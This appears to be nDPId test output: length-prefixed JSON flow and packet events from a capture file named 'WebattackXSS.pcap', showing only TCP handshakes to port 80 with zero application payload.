-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347699724,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347699724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2NAAD4Gcm2sEAABwKgKMupUAFDv6uGsAAAAAKACchDuvAAAAgQFtAQCCAoBO7LPAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":2,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347699724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6lS1E1w77+rhraAScSBWIwAAAgQFtAQCCAoD5YREATuyzwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":3,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2RAAD4GcnSsEAABwKgKMupUAFDv6uGttRNcPIAQAOX1KgAAAQEICgE7ss8D5YRE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347702287,"flow_last_seen":1499347702287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347702287,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6145,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1499347702287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dHpAAD4GUVasEAABwKgKMupuAFBhicEqAAAAAKACchCbBQAAAgQFtAQCCAoBO7VQAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":2,"flow_last_seen":1499347702287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347702287,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6m4\/xiwDYYnBK6AScSClcAAAAgQFtAQCCAoD5YbFATu1UAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6147,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":3,"flow_last_seen":1499347702288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347702288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dHtAAD4GUV2sEAABwKgKMupuAFBhicErP8YsBIAQAOVEeAAAAQEICgE7tVAD5YbF"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347703726,"flow_last_seen":1499347703726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347703726,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6157,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1499347703726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80EJAAD4G9Y2sEAABwKgKMup8AFAHaGb6AAAAAKACchBN4QAAAgQFtAQCCAoBO7a4AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6158,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":2,"flow_last_seen":1499347703726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347703726,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6nwCGRKtB2hm+6AScSCt5wAAAgQFtAQCCAoD5YgtATu2uAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6159,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":3,"flow_last_seen":1499347703727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347703727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00ENAAD4G9ZSsEAABwKgKMup8AFAHaGb7AhkSroAQAOVM7wAAAQEICgE7trgD5Ygt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347705116,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347705116,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oq5AAD4GIyKsEAABwKgKMuqKAFDjSRq9AAAAAKACchC80wAAAgQFtAQCCAoBO7gTAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":2,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347705116,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6oqWCrpo40kavqAScSDf0QAAAgQFtAQCCAoD5YmIATu4EwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6174,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":3,"flow_last_seen":1499347705116,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347705116,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oq9AAD4GIymsEAABwKgKMuqKAFDjSRq+lgq6aYAQAOV+2QAAAQEICgE7uBMD5YmI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347706399,"flow_last_seen":1499347706399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347706399,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1499347706399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F3NAAD4Grl2sEAABwKgKMuqYAFBMGa4nAAAAAKACchC\/SgAAAgQFtAQCCAoBO7lUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":2,"flow_last_seen":1499347706399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347706399,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6pjZqykETBmuKKAScSAuywAAAgQFtAQCCAoD5YrJATu5VAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":3,"flow_last_seen":1499347706400,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347706400,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0F3RAAD4GrmSsEAABwKgKMuqYAFBMGa4o2aspBYAQAOXN0gAAAQEICgE7uVQD5YrJ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347709252,"flow_last_seen":1499347709252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709252,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1499347709252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u61AAD4GCiOsEAABwKgKMuq0AFAeNwewAAAAAKACchCQvwAAAgQFtAQCCAoBO7wdAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":2,"flow_last_seen":1499347709253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347709253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6rSwITsWHjcHsaAScSAU7wAAAgQFtAQCCAoD5Y2SATu8HQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":3,"flow_last_seen":1499347709253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347709253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u65AAD4GCiqsEAABwKgKMuq0AFAeNwexsCE7F4AQAOWz9QAAAQEICgE7vB4D5Y2S"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347709257,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347712277,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347712277,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1499347712277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347712277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nw9AAD4GJsGsEAABwKgKMurmAFCpjSAeAAAAAKACchDp1AAAAgQFtAQCCAoBO78RAAAAAAEDAwc="} 
